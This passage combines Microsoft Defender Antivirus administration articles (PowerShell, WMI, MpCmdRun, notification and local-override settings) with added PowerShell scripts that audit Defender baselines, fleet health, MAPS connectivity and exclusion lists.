the command prompt or command line, PowerShell is a task-based command-line shell
and scripting language designed especially for system administration. You can read
more about it in the PowerShell documentation.

For a list of the cmdlets and their functions and available parameters, see the Defender
Antivirus cmdlets topic.

PowerShell cmdlets are most useful in Windows Server environments that don't rely on a
graphical user interface (GUI) to configure software.

7 Note

PowerShell cmdlets should not be used as a replacement for a full network policy
management infrastructure, such as Microsoft Endpoint Configuration Manager,
Group Policy Management Console, or Microsoft Defender Antivirus Group Policy
ADMX templates.

Changes made with PowerShell will affect local settings on the endpoint where the
changes are deployed or made. This means that deployments of policy with Group
Policy, Microsoft Endpoint Configuration Manager, or Microsoft Intune can overwrite
changes made with PowerShell.

You can configure which settings can be overridden locally with local policy overrides.

PowerShell is typically installed under the folder
%SystemRoot%\system32\WindowsPowerShell.

Use Microsoft Defender Antivirus PowerShell cmdlets
1. In the Windows search bar, type powershell.
2. Select Windows PowerShell from the results to open the interface.
3. Enter the PowerShell command and any parameters.

7 Note

You may need to open PowerShell in administrator mode. Right-click the item in
the Start menu, click Run as administrator and click Yes at the permissions prompt.

To open online help for any of the cmdlets type the following:

PowerShell

Get-Help <cmdlet> -Online

Omit the -online parameter to get locally cached help.
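The note above matters more than it looks: Set-MpPreference silently loses to any value that Group Policy, Intune or Configuration Manager has pinned, so a script that only calls Set-MpPreference can report success while nothing changes. The following script is an added example (not code from the Microsoft documentation or from the Defender module) that audits a handful of Microsoft Defender Antivirus preferences against a baseline, checks whether each one is pinned by policy before touching it, and then reads Get-MpComputerStatus for the engine's own view. It assumes the Defender module cmdlets Get-MpPreference, Set-MpPreference and Get-MpComputerStatus, and that Group Policy writes Defender settings beneath HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender with the value names listed in the baseline; the baseline values themselves are this example's choice, not a Microsoft-published baseline.

```powershell
# Added example, not from the Microsoft documentation. Audit Microsoft Defender
# Antivirus preferences against a baseline and flag settings that policy has
# pinned, because Set-MpPreference cannot override those.
# Assumptions: the Defender module is present; policy values live under
# HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\<SubKey>\<ValueName>
# with the names used in $Baseline. Baseline values are this example's choice.
#Requires -RunAsAdministrator

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

# Preference name (Get-MpPreference property) -> expected value, plus the
# assumed policy registry location that would pin it.
$Baseline = @(
    @{ Name = 'DisableRealtimeMonitoring'; Expected = $false; PolicyKey = 'Real-Time Protection'; PolicyValue = 'DisableRealtimeMonitoring' }
    @{ Name = 'DisableBehaviorMonitoring'; Expected = $false; PolicyKey = 'Real-Time Protection'; PolicyValue = 'DisableBehaviorMonitoring' }
    @{ Name = 'DisableIOAVProtection';     Expected = $false; PolicyKey = 'Real-Time Protection'; PolicyValue = 'DisableIOAVProtection' }
    @{ Name = 'MAPSReporting';             Expected = 2;      PolicyKey = 'Spynet';               PolicyValue = 'SpynetReporting' }
    @{ Name = 'SubmitSamplesConsent';      Expected = 1;      PolicyKey = 'Spynet';               PolicyValue = 'SubmitSamplesConsent' }
)

function Get-PolicyPin {
    # Returns the policy value if Group Policy/MDM has set it, otherwise $null.
    param([string]$SubKey, [string]$ValueName)
    $key = Join-Path $PolicyRoot $SubKey
    if (-not (Test-Path $key)) { return $null }
    (Get-ItemProperty -Path $key -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
}

function Test-DefenderBaseline {
    # Emits one record per baseline item; with -Remediate, fixes local drift
    # and warns (instead of trying) where the setting is policy-managed.
    param([switch]$Remediate)
    $pref = Get-MpPreference
    foreach ($item in $Baseline) {
        $actual = $pref.($item.Name)
        $pinned = Get-PolicyPin -SubKey $item.PolicyKey -ValueName $item.PolicyValue
        $state  = if ($actual -eq $item.Expected) { 'OK' } else { 'DRIFT' }
        [pscustomobject]@{
            Setting       = $item.Name
            Actual        = $actual
            Expected      = $item.Expected
            State         = $state
            PolicyManaged = ($null -ne $pinned)
        }
        if ($Remediate -and $state -eq 'DRIFT') {
            if ($null -ne $pinned) {
                Write-Warning "$($item.Name) is pinned by policy ($($item.PolicyKey)\$($item.PolicyValue)=$pinned); change the GPO/Intune profile, not the local preference."
            } else {
                # Splat a one-entry hashtable so the property name becomes the parameter name.
                $splat = @{ $item.Name = $item.Expected }
                Set-MpPreference @splat
                Write-Host "Remediated $($item.Name) -> $($item.Expected)"
            }
        }
    }
}

Test-DefenderBaseline | Format-Table -AutoSize

# The engine's own status is the authoritative view of what is enforced right now.
Get-MpComputerStatus | Select-Object AMServiceEnabled, RealTimeProtectionEnabled,
    BehaviorMonitorEnabled, IoavProtectionEnabled, AntivirusSignatureAge
```

Run it first without -Remediate to see the drift report; records with PolicyManaged set to True are the ones a local Set-MpPreference will not fix, and they are also the ones to re-check after the next Group Policy refresh, because policy will reapply its value regardless of what the local preference says.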


Related topics
Performance analyzer for Microsoft Defender Antivirus
Reference topics for management and configuration tools
Microsoft Defender Antivirus in Windows 10
Microsoft Defender Antivirus Cmdlets

Use Windows Management Instrumentation (WMI) to configure and manage Microsoft Defender Antivirus
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Windows Management Instrumentation (WMI) is a scripting interface that allows you to
retrieve, modify, and update settings.

Read more about WMI at the Microsoft Developer Network System Administration
library.

Microsoft Defender Antivirus has a number of specific WMI classes that can be used to
perform most of the same functions as Group Policy and other management tools.
Many of the classes are analogous to the Microsoft Defender Antivirus PowerShell cmdlets.

The MSDN Windows Defender WMIv2 Provider reference library lists the available WMI
classes for Microsoft Defender Antivirus, and includes example scripts.

Changes made with WMI will affect local settings on the endpoint where the changes
are deployed or made. This means that deployments of policy with Group Policy,
Microsoft Endpoint Configuration Manager, or Microsoft Intune can overwrite changes
made with WMI.

You can configure which settings can be overridden locally with local policy overrides.
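Where the WMI provider earns its keep is remote, read-mostly work: pulling the same status from many endpoints over WinRM without installing anything. The script below is an added example (not code from the Microsoft documentation or from the WMIv2 provider reference) that collects a fleet health snapshot through CIM and starts a quick scan on hosts whose last quick scan is older than a threshold. It assumes the provider namespace root\Microsoft\Windows\Defender with the classes MSFT_MpComputerStatus, MSFT_MpPreference and MSFT_MpScan (static Start method taking a ScanType, where 1 is a quick scan), that WinRM is enabled on the targets and the caller is a local administrator there; the host list and thresholds are placeholders.

```powershell
# Added example, not from the Microsoft documentation. Fleet health via the
# Microsoft Defender Antivirus WMIv2 provider over CIM/WinRM.
# Assumptions: namespace root\Microsoft\Windows\Defender; classes
# MSFT_MpComputerStatus, MSFT_MpPreference, MSFT_MpScan (static Start method,
# ScanType 1 = quick, 2 = full, 3 = custom with ScanPath); WinRM reachable;
# caller is a local admin on each target. Host names are placeholders.
$Namespace = 'root\Microsoft\Windows\Defender'
$Hosts     = @('localhost')       # e.g. @('ws01', 'ws02') in a real run

function Get-DefenderHealth {
    # One record per host; errors (offline, access denied) land in the Error column
    # instead of aborting the whole sweep.
    param(
        [string[]]$ComputerName,
        [int]$MaxSignatureAgeDays = 3,
        [int]$MaxQuickScanAgeDays = 7
    )
    foreach ($c in $ComputerName) {
        $session = $null
        try {
            $session = New-CimSession -ComputerName $c -ErrorAction Stop
            $status  = Get-CimInstance -CimSession $session -Namespace $Namespace -ClassName MSFT_MpComputerStatus
            $pref    = Get-CimInstance -CimSession $session -Namespace $Namespace -ClassName MSFT_MpPreference
            [pscustomobject]@{
                Computer         = $c
                RealTimeOn       = $status.RealTimeProtectionEnabled
                TamperProtection = $status.IsTamperProtected
                SignatureAgeDays = $status.AntivirusSignatureAge
                SignatureStale   = ($status.AntivirusSignatureAge -gt $MaxSignatureAgeDays)
                QuickScanAgeDays = $status.QuickScanAge
                QuickScanOverdue = ($status.QuickScanAge -gt $MaxQuickScanAgeDays)
                # Exclusions are the first thing to review on a host that looks healthy but is not.
                ExclusionCount   = @($pref.ExclusionPath).Count + @($pref.ExclusionProcess).Count + @($pref.ExclusionExtension).Count
                Error            = $null
            }
        } catch {
            [pscustomobject]@{
                Computer = $c; RealTimeOn = $null; TamperProtection = $null
                SignatureAgeDays = $null; SignatureStale = $null
                QuickScanAgeDays = $null; QuickScanOverdue = $null
                ExclusionCount = $null; Error = $_.Exception.Message
            }
        } finally {
            if ($session) { Remove-CimSession $session }
        }
    }
}

function Start-DefenderQuickScan {
    # Invokes the static Start method on MSFT_MpScan; returns the method result object.
    param([string]$ComputerName)
    Invoke-CimMethod -ComputerName $ComputerName -Namespace $Namespace `
        -ClassName MSFT_MpScan -MethodName Start -Arguments @{ ScanType = [uint32]1 }
}

$report = Get-DefenderHealth -ComputerName $Hosts
$report | Format-Table -AutoSize

# Hosts that answered and are overdue get a quick scan; stale signatures and
# disabled real-time protection are reported for follow-up rather than "fixed" here,
# because both are usually a policy or connectivity problem, not a scan problem.
$report | Where-Object { -not $_.Error -and $_.QuickScanOverdue } |
    ForEach-Object { Start-DefenderQuickScan -ComputerName $_.Computer | Out-Null }
$report | Where-Object { $_.SignatureStale -or ($_.RealTimeOn -eq $false) } |
    ForEach-Object { Write-Warning "$($_.Computer): signature age $($_.SignatureAgeDays)d, real-time protection $($_.RealTimeOn)" }
```

Everything here is a read except the explicit Start call, which is the right split for a WMI-based tool: the same caveat as for PowerShell applies to any MSFT_MpPreference Set call, since Group Policy, Intune or Configuration Manager will overwrite a local change on the next refresh.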


Related topics
Performance analyzer for Microsoft Defender Antivirus
Reference topics for management and configuration tools
Microsoft Defender Antivirus in Windows 10


Configure and manage Microsoft Defender Antivirus with the mpcmdrun.exe command-line tool
Article • 06/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

You can perform various functions in Microsoft Defender Antivirus using the dedicated
command-line tool mpcmdrun.exe. This utility is useful when you want to automate
Microsoft Defender Antivirus tasks. You can find the utility in
%ProgramFiles%\Windows Defender\MpCmdRun.exe. Run it from a command prompt.

Tip

You might need to open an administrator-level version of the command prompt.
When you search for Command Prompt on the Start menu, choose Run as
administrator. If you're running an updated Microsoft Defender antimalware
platform version, run MpCmdRun from the following location:
C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>.
For more information about the antimalware platform, see Microsoft
Defender Antivirus updates and baselines.

The MpCmdRun utility uses the following syntax:

Console

MpCmdRun.exe [command] [-options]

Here's an example:

Console
MpCmdRun.exe -Scan -ScanType 2

In our example, the MpCmdRun utility starts a full antivirus scan on the device.

Commands

| Command | Description |
|---|---|
| `-?` or `-h` | Displays all available options for the MpCmdRun tool |
| `-Scan [-ScanType [<value>]] [-File <path> [-DisableRemediation] [-BootSectorScan] [-CpuThrottling]] [-Timeout <days>] [-Cancel]` | Scans for malicious software. Values for ScanType are: 0 Default, according to your configuration; 1 Quick scan; 2 Full scan; 3 File and directory custom scan. CpuThrottling runs according to policy configurations. |
| `-Trace [-Grouping #] [-Level #]` | Starts diagnostic tracing |
| `-CaptureNetworkTrace -Path <path>` | Captures all the network input into the Network Protection service and saves it to a file at `<path>`. Supply an empty path to stop tracing. |
| `-GetFiles [-SupportLogLocation <path>]` | Collects support information. See collecting diagnostic data. |
| `-GetFilesDiagTrack` | Same as `-GetFiles`, but outputs to temporary DiagTrack folder. |
| `-RemoveDefinitions [-All]` | Restores the installed security intelligence to a previous backup copy or to the original default set. |
| `-RemoveDefinitions [-DynamicSignatures]` | Removes only the dynamically downloaded security intelligence. |
| `-RemoveDefinitions [-Engine]` | Restores the previous installed engine. |
| `-SignatureUpdate [-UNC \| -MMPC]` | Checks for new security intelligence updates. |
| `-Restore [-ListAll \| [[-Name <name>] [-All] \| [-FilePath <filePath>]] [-Path <path>]]` | Restores or lists quarantined item(s). |
| `-AddDynamicSignature [-Path]` | Loads dynamic security intelligence. |
| `-ListAllDynamicSignatures` | Lists the loaded dynamic security intelligence. |
| `-RemoveDynamicSignature [-SignatureSetID]` | Removes dynamic security intelligence. |
| `-CheckExclusion -path <path>` | Checks whether a path is excluded. |
| `-ValidateMapsConnection` | Verifies that your network can communicate with the Microsoft Defender Antivirus cloud service. This command only works on Windows 10, version 1703 or higher. |
| `-ResetPlatform` | Reset platform binaries back to `%ProgramFiles%\Windows Defender`. |
| `-RevertPlatform` | Revert platform binaries back to the previously installed version of the Defender platform. |

Common errors in running commands via mpcmdrun.exe
The following table lists common errors that can occur while using the MpCmdRun tool.

| Error message | Possible reason |
|---|---|
| `ValidateMapsConnection failed (800106BA)` or `0x800106BA` | The Microsoft Defender Antivirus service is disabled. Enable the service and try again. If you need help re-enabling Microsoft Defender Antivirus, see Reinstall/enable Microsoft Defender Antivirus on your endpoints. Note that in Windows 10 1909 or older, and Windows Server 2019 or older, the service was formerly called Windows Defender Antivirus. |
| `0x80070667` | You're running the `-ValidateMapsConnection` command from a computer that is Windows 10 version 1607 or older, or Windows Server 2016 or older. Run the command from a machine that is Windows 10 version 1703 or newer, or Windows Server 2019 or newer. |
| `MpCmdRun is not recognized as an internal or external command, operable program, or batch file.` | The tool must be run from either `%ProgramFiles%\Windows Defender` or `C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2012.4-0` (where `2012.4-0` might differ since platform updates are monthly except for March) |
| `ValidateMapsConnection failed to establish a connection to MAPS (hr=80070005 httpcode=450)` | The command was attempted using insufficient privileges. Use the command prompt (cmd.exe) as an administrator. |
| `ValidateMapsConnection failed to establish a connection to MAPS (hr=80070006 httpcode=451)` | The firewall is blocking the connection or conducting SSL inspection. |
| `ValidateMapsConnection failed to establish a connection to MAPS (hr=80004005 httpcode=450)` | Possible network-related issues, like name resolution problems |
| `ValidateMapsConnection failed to establish a connection to MAPS (hr=0x80508015)` | The firewall is blocking the connection or conducting SSL inspection. |
| `ValidateMapsConnection failed to establish a connection to MAPS (hr=800722F0D)` | The firewall is blocking the connection or conducting SSL inspection. |
| `ValidateMapsConnection failed to establish a connection to MAPS (hr=80072EE7 httpcode=451)` | The firewall is blocking the connection or conducting SSL inspection. |
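Two of the errors above ("MpCmdRun is not recognized" and the 0x80070005 privilege failure) are about how the tool is launched rather than what it reports, so a wrapper that always resolves the current platform folder and runs elevated removes them. The script below is an added example (not code from the Microsoft documentation or from the MpCmdRun tool itself) that locates the MpCmdRun.exe matching the installed antimalware platform, runs -ValidateMapsConnection and pulls the hr/httpcode values out of a failure for triage, then uses -CheckExclusion to test whether a few paths attackers like to drop payloads into have been excluded from scanning. It assumes platform folders under C:\ProgramData\Microsoft\Windows Defender\Platform\<version> with the fallback copy under %ProgramFiles%\Windows Defender, that MpCmdRun returns a non-zero exit code on failure and prints the hr=/httpcode= text shown in this article, and that -CheckExclusion answers with a line containing "excluded" or "not excluded"; the list of paths checked is this example's own.

```powershell
# Added example, not from the Microsoft documentation. Wrapper around MpCmdRun.exe
# that always uses the binary matching the installed antimalware platform.
# Assumptions: platform folders live under
#   C:\ProgramData\Microsoft\Windows Defender\Platform\<version>,
# the fallback binary under %ProgramFiles%\Windows Defender; a failed
# -ValidateMapsConnection exits non-zero and prints "hr=... httpcode=..."; and
# -CheckExclusion prints a line containing "excluded" / "not excluded".
#Requires -RunAsAdministrator

function Get-MpCmdRunPath {
    # Prefer the newest platform folder (names like 4.18.24010.7-0), per the tip above.
    $platformRoot = Join-Path $env:ProgramData 'Microsoft\Windows Defender\Platform'
    if (Test-Path $platformRoot) {
        $newest = Get-ChildItem -Path $platformRoot -Directory |
            Sort-Object { [version]($_.Name -replace '-.*$', '') } -Descending |
            Select-Object -First 1
        if ($newest) {
            $candidate = Join-Path $newest.FullName 'MpCmdRun.exe'
            if (Test-Path $candidate) { return $candidate }
        }
    }
    # Fallback: the copy shipped with Windows.
    Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
}

function Test-MapsConnectivity {
    # Runs -ValidateMapsConnection and extracts hr= / httpcode= from a failure line,
    # so the result can be matched against the error table in this article.
    $exe    = Get-MpCmdRunPath
    $output = (& $exe -ValidateMapsConnection 2>&1 | Out-String)
    $exit   = $LASTEXITCODE
    $hr     = if ($output -match 'hr=(0x)?([0-9A-Fa-f]+)') { $Matches[2] } else { $null }
    $http   = if ($output -match 'httpcode=(\d+)')         { [int]$Matches[1] } else { $null }
    [pscustomobject]@{
        Tool     = $exe
        Success  = ($exit -eq 0)
        ExitCode = $exit
        Hresult  = $hr
        HttpCode = $http
        Output   = $output.Trim()
    }
}

function Test-PathExcluded {
    # One record per path; Excluded = $true means real-time and scheduled scans skip it.
    param([string[]]$Path)
    $exe = Get-MpCmdRunPath
    foreach ($p in $Path) {
        $out = (& $exe -CheckExclusion -path $p 2>&1 | Out-String)
        $excluded = ($out -match '(?i)\bexcluded\b') -and ($out -notmatch '(?i)\bnot excluded\b')
        [pscustomobject]@{ Path = $p; Excluded = $excluded; Raw = $out.Trim() }
    }
}

Test-MapsConnectivity | Format-List

# Locations commonly abused for staging payloads; any Excluded = True here deserves a ticket.
Test-PathExcluded -Path @(
    $env:TEMP,
    $env:ProgramData,
    'C:\Windows\Temp',
    (Join-Path $env:USERPROFILE 'Downloads')
) | Format-Table -AutoSize
```

A MAPS failure with httpcode 451 and one of the hr values in the table is almost always TLS interception on the egress path; fix it with an inspection bypass for the Defender cloud endpoints rather than by loosening the endpoint, because cloud-delivered protection is disabled in practice while that check fails.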

See also
Performance analyzer for Microsoft Defender Antivirus
Configure Microsoft Defender Antivirus features
Configure and validate Microsoft Defender Antivirus network connections
Reference topics for management and configuration tools
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features


Configure Microsoft Defender Antivirus notifications that appear on endpoints
Article • 02/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

In Windows 10 and Windows 11, application notifications about malware detection and
remediation are more robust, consistent, and concise. Microsoft Defender Antivirus
notifications appear on endpoints when scans are completed and threats are detected.
Notifications follow both scheduled and manually triggered scans. These notifications
also appear in the Notification Center, and a summary of scans and threat detections
appear at regular time intervals.

If you're part of your organization's security team, you can configure how notifications
appear on endpoints, such as notifications that prompt for a system reboot or that
indicate a threat has been detected and remediated.

Configure antivirus notifications using Group Policy or the Windows Security app
You can configure the display of additional notifications, such as recent threat detection
summaries, in the Windows Security app and with Group Policy.

7 Note

In Windows 10, version 1607 the feature was called Enhanced notifications and
was configured under Windows Settings > Update & security > Windows
Defender. In Group Policy settings for all versions of Windows 10 and Windows 11,
the notification feature is called Enhanced notifications.

Use Group Policy to disable additional notifications
1. On your Group Policy management computer, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure, and then select Edit.

3. In the Group Policy Management Editor go to Computer configuration.

4. Select Administrative templates.

5. Expand the tree to Windows components > Microsoft Defender Antivirus >
Reporting.

6. Double-click Turn off enhanced notifications, and set the option to Enabled. Then
select OK. This will prevent additional notifications from appearing.

) Important

Disabling additional notifications will not disable critical notifications, such as threat
detection and remediation alerts.

Use the Windows Security app to disable additional notifications
1. Open the Windows Security app by clicking the shield icon in the task bar or
searching the start menu for Security.

2. Select Virus & threat protection tile (or the shield icon on the left menu bar) and,
then select Virus & threat protection settings

3. Scroll to the Notifications section and select Change notification settings.

4. Slide the switch to Off or On to disable or enable additional notifications.

) Important

Disabling additional notifications will not disable critical notifications, such as threat
detection and remediation alerts.

Configure standard notifications on endpoints using Group Policy
You can use Group Policy to:

Display additional, customized text on endpoints when the user needs to perform
an action
Hide all notifications on endpoints
Hide reboot notifications on endpoints

Hiding notifications can be useful in situations where you can't hide the entire Microsoft
Defender Antivirus interface. See Prevent users from seeing or interacting with the
Microsoft Defender Antivirus user interface for more information. Hiding notifications
will only occur on endpoints to which the policy has been deployed. Notifications
related to actions that must be taken (such as a reboot) will still appear on the Microsoft
Configuration Manager Endpoint Protection monitoring dashboard and reports.

To add custom contact information to endpoint notifications, see Customize the
Windows Security app for your organization.

Use Group Policy to hide notifications
1. On your Group Policy management computer, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure, and then select Edit.

3. In the Group Policy Management Editor go to Computer configuration and then
select Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Client interface.

5. Double-click Suppress all notifications and set the option to Enabled.

6. Select OK. This prevents Microsoft Defender Antivirus notifications from appearing on the endpoint.

Use Group Policy to hide reboot notifications


1. On your Group Policy management computer, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure and then select Edit.

3. In the Group Policy Management Editor go to Computer configuration.

4. Select Administrative templates.
5. Expand the tree to Windows components > Microsoft Defender Antivirus >
Client interface.

6. Double-click Suppresses reboot notifications and set the option to Enabled.

7. Select OK. This prevents reboot notifications from appearing on the endpoint.


Prevent or allow users to locally modify Microsoft Defender Antivirus policy settings
Article • 07/13/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

By default, Microsoft Defender Antivirus settings that are deployed via a Group Policy
Object to the endpoints in your network will prevent users from locally changing the
settings. You can change this configuration in some instances. For example, it might be
necessary to allow certain user groups, such as security researchers and threat
investigators, to have further control over individual settings on the endpoints they use.

Configure local overrides for Microsoft Defender Antivirus settings
The default setting for these local override policies is Disabled.

If the policies are set to Enabled, users can make changes to the associated settings on
their devices by using the Windows Security app, local Group Policy settings, or
PowerShell cmdlets (where appropriate).

The table of settings section lists override policy settings and the configuration
instructions.

To configure these settings:

1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and then select
Edit.

2. In the Group Policy Management Editor go to Computer configuration and select
Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus and
then the Location specified in the table of settings section (in this article).

4. Double-click the policy Setting as specified in the table below, and set the option
to your desired configuration. Select OK, and repeat for any other settings.

5. Deploy the Group Policy Object as usual.

Table of settings

| Location | Setting | Article |
|---|---|---|
| MAPS | Configure local setting override for reporting to Microsoft MAPS | Enable cloud-delivered protection |
| Quarantine | Configure local setting override for the removal of items from Quarantine folder | Configure remediation for scans |
| Real-time protection | Configure local setting override for monitoring file and program activity on your computer | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring |
| Real-time protection | Configure local setting override for monitoring for incoming and outgoing file activity | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring |
| Real-time protection | Configure local setting override for scanning all downloaded files and attachments | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring |
| Real-time protection | Configure local setting override for turn on behavior monitoring | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring |
| Real-time protection | Configure local setting override to turn on real-time protection | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring |
| Remediation | Configure local setting override for the time of day to run a scheduled full scan to complete remediation | Configure remediation for scans |
| Scan | Configure local setting override for maximum percentage of CPU utilization | Configure and run scans |
| Scan | Configure local setting override for schedule scan day | Configure scheduled scans |
| Scan | Configure local setting override for scheduled quick scan time | Configure scheduled scans |
| Scan | Configure local setting override for scheduled scan time | Configure scheduled scans |
| Scan | Configure local setting override for the scan type to use for a scheduled scan | Configure scheduled scans |

Configure how locally and globally defined threat remediation and exclusions lists
are merged

You can also configure how locally defined lists are combined or merged with globally
defined lists. This setting applies to exclusion lists, specified remediation lists, and attack
surface reduction.

By default, lists that have been configured in local group policy and the Windows
Security app are merged with lists that are defined by the appropriate Group Policy
Object that you have deployed on your network. Where there are conflicts, the globally
defined list takes precedence. You can disable this setting to ensure that only globally
defined lists (such as those from any deployed GPOs) are used.

Use Group Policy to disable local list merging

1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and click Edit.

2. In the Group Policy Management Editor, go to Computer configuration and select
Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus.

4. Double-click Configure local administrator merge behavior for lists and set the
option to Disabled. Then select OK.

7 Note

For "Administrative Templates (.admx) for Windows 11 2022 Update (22H2)" and
"Administrative Templates (.admx) for Windows 10 November 2021 Update (21H2)"
templates, set Configure local administrator merge behavior for lists to Enabled
to disable the local administrator merge behavior.

Use Microsoft Intune to disable local list merging

1. In the Microsoft Intune admin center, select Endpoint security > Antivirus.

2. Choose Create Policy, or modify an existing Microsoft Defender Antivirus policy.

3. Under Configuration settings, select the drop-down next to Disable Local
Admin Merge and select Disable Local Admin Merge.

7 Note

If you disable local list merging, it overrides controlled folder access settings
defined locally. It also overrides any protected folders or allowed apps set by the
local administrator. For more information about controlled folder access settings,
see Allow a blocked app in Windows Security.
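As an added example (not from this article or the product documentation), the following PowerShell audits one device for the merge behavior described above: it compares the exclusion lists Defender actually enforces (as reported by Get-MpPreference, which is assumed to return the effective merged lists when run elevated) with the lists delivered by policy, and flags entries that exist only because a local administrator added them. The policy registry key and value names (DisableLocalAdminMerge, Exclusions\Paths, Exclusions\Processes, Exclusions\Extensions) are the ones written by the Defender ADMX templates and should be confirmed on your build.

```powershell
# Added example, not from the Microsoft page. Run in an elevated session:
# Get-MpPreference hides exclusion lists from non-administrators.
# Assumption: policy-delivered lists and the merge switch live under this key
# with the ADMX value names used below.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

function Get-PolicyExclusions {
    # Returns one policy-defined exclusion list. Each exclusion is stored as a
    # registry value name (the path, process or extension) with data 0.
    param([ValidateSet('Paths', 'Processes', 'Extensions')][string]$Kind)
    $key = Join-Path $PolicyRoot "Exclusions\$Kind"
    if (-not (Test-Path $key)) { return @() }
    @((Get-Item -Path $key).GetValueNames())
}

function Get-LocalAdminMergeReport {
    $pref = Get-MpPreference

    # DisableLocalAdminMerge = $true means only policy (GPO/Intune) lists apply.
    $mergeDisabled = [bool]$pref.DisableLocalAdminMerge
    $policyValue   = (Get-ItemProperty -Path $PolicyRoot -Name DisableLocalAdminMerge `
                        -ErrorAction SilentlyContinue).DisableLocalAdminMerge

    # Effective (merged) lists as Defender reports them, versus what policy defines.
    $lists = [ordered]@{
        Paths      = @{ Effective = @($pref.ExclusionPath);      Policy = Get-PolicyExclusions Paths }
        Processes  = @{ Effective = @($pref.ExclusionProcess);   Policy = Get-PolicyExclusions Processes }
        Extensions = @{ Effective = @($pref.ExclusionExtension); Policy = Get-PolicyExclusions Extensions }
    }

    foreach ($kind in $lists.Keys) {
        $effective = @($lists[$kind].Effective | Where-Object { $_ })
        $policy    = @($lists[$kind].Policy)
        # Anything in effect that policy did not define came from a local admin
        # (Windows Security app, local GPO or Set-MpPreference). Comparison is
        # case-insensitive, as PowerShell's -notcontains is by default.
        $localOnly = @($effective | Where-Object { $policy -notcontains $_ })
        [pscustomobject]@{
            List           = $kind
            PolicyDefined  = $policy.Count
            Effective      = $effective.Count
            LocalOnly      = ($localOnly -join '; ')
            MergeDisabled  = $mergeDisabled
            PolicyRegValue = $policyValue
            # Local entries that are still enforced while merging is allowed are
            # exactly what an attacker with local admin rights adds to hide tooling.
            Finding        = if ($localOnly.Count -gt 0 -and -not $mergeDisabled) { 'local exclusions active' } else { 'ok' }
        }
    }
}

Get-LocalAdminMergeReport | Format-Table -AutoSize
```

Run it before and after deploying the GPO or Intune policy: after the change, LocalOnly entries should no longer influence scanning, and MergeDisabled should read True. Because Get-MpPreference shows the effective value, a mismatch between MergeDisabled and PolicyRegValue usually means the policy has not refreshed yet or a different management channel is setting the value.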

 Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Related topics
Microsoft Intune
Microsoft Defender Antivirus in Windows
Configure end-user interaction with Microsoft Defender Antivirus

 Tip
Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Prevent users from seeing or interacting with the Microsoft Defender Antivirus
user interface
Article • 07/26/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

You can use Group Policy to prevent users on endpoints from seeing the Microsoft
Defender Antivirus interface. You can also prevent them from pausing scans.

Hide the Microsoft Defender Antivirus interface

In Windows 10, version 1703 and later, hiding the interface hides Microsoft Defender
Antivirus notifications and prevents the Virus & threat protection tile from appearing
in the Windows Security app.

(The original article shows two screenshots of the Windows Security app here: one
with the setting set to Enabled and one with the setting set to Disabled or not
configured.)


7 Note

Hiding the interface also prevents Microsoft Defender Antivirus notifications
from appearing on the endpoint. Microsoft Defender for Endpoint notifications
still appear. You can also individually configure the notifications that appear on
endpoints.

In earlier versions of Windows 10, the setting hides the Windows Defender client
interface. If the user attempts to open it, they'll receive a warning that says, "Your system
administrator has restricted access to this app."

Use Group Policy to hide the Microsoft Defender Antivirus interface from users

1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. Using the Group Policy Management Editor go to Computer configuration.

3. Select Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Client interface.

5. Double-click the Enable headless UI mode setting and set the option to Enabled.
Select OK.

See Prevent users from locally modifying policy settings for more options on preventing
users from modifying protection on their PCs.

Prevent users from pausing a scan

You can prevent users from pausing scans, which helps ensure that scheduled or
on-demand scans aren't interrupted by users.

7 Note

This setting is not supported on Windows 10.

Use Group Policy to prevent users from pausing a scan

1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. Using the Group Policy Management Editor go to Computer configuration.

3. Select Administrative templates.

